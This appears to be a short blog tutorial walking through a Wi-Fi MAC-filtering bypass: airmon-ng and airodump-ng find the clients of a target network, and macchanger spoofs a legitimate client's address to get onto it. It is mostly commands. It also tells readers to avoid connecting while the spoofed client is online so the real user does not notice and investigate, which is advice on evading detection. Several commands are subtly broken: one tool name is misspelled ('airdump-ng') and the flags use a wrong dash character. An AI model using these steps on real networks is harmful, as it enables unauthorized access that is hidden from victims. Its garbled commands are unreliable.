Bypass MAC Filtering

This attack scenario will prove that the MAC filtering mechanism can be bypassed very easily and provides no security at all. The idea behind this attack is to locate the MAC addresses of legitimate clients and then spoof it in order to be accepted from the MAC filtering list.

Steps:

Create a monitoring interface with the following command:

airmon-ng start INTERFACE

You can capture authentication frames in Wireshark with the following filter:

wlan.fc.type_subtype == 0x0b

Identify the target network using Airodump-ng:

airdump-ng MONITOR_INTERFACE

Try to connect to your target Access Point and check Wireshark output:

iwconfig INTERFACE essid “NETWORK_ESSID”

Now, provide the BSSID of the target network in order to locate legitimate clients and their MAC address:

airodump-ng —-bssid MAC_ADDRESS MONITOR_INTERFACE

I’m going to use the macchanger tool to easily change the physical address of my
wireless network interface.

macchanger —-mac=MAC_ADDRESS INTERFACE

After restarting the network-manager service, you are ready to connect:

service network-manager restart

Always have in mind that you should not connect to the network when the client, whose MAC address you are spoofing is connected also. The connection will succeed but you will create a network conflict and legitimate client will start investigating the connectivity issue.
Be sure to check it with airodump-ng first!

Before you go

Thank you for taking the time to read my article. If you found it helpful, please hit the 👏 button 👏 (up to 50x) and share it to help others with similar interest find it! + Feedback is always welcome! 🙏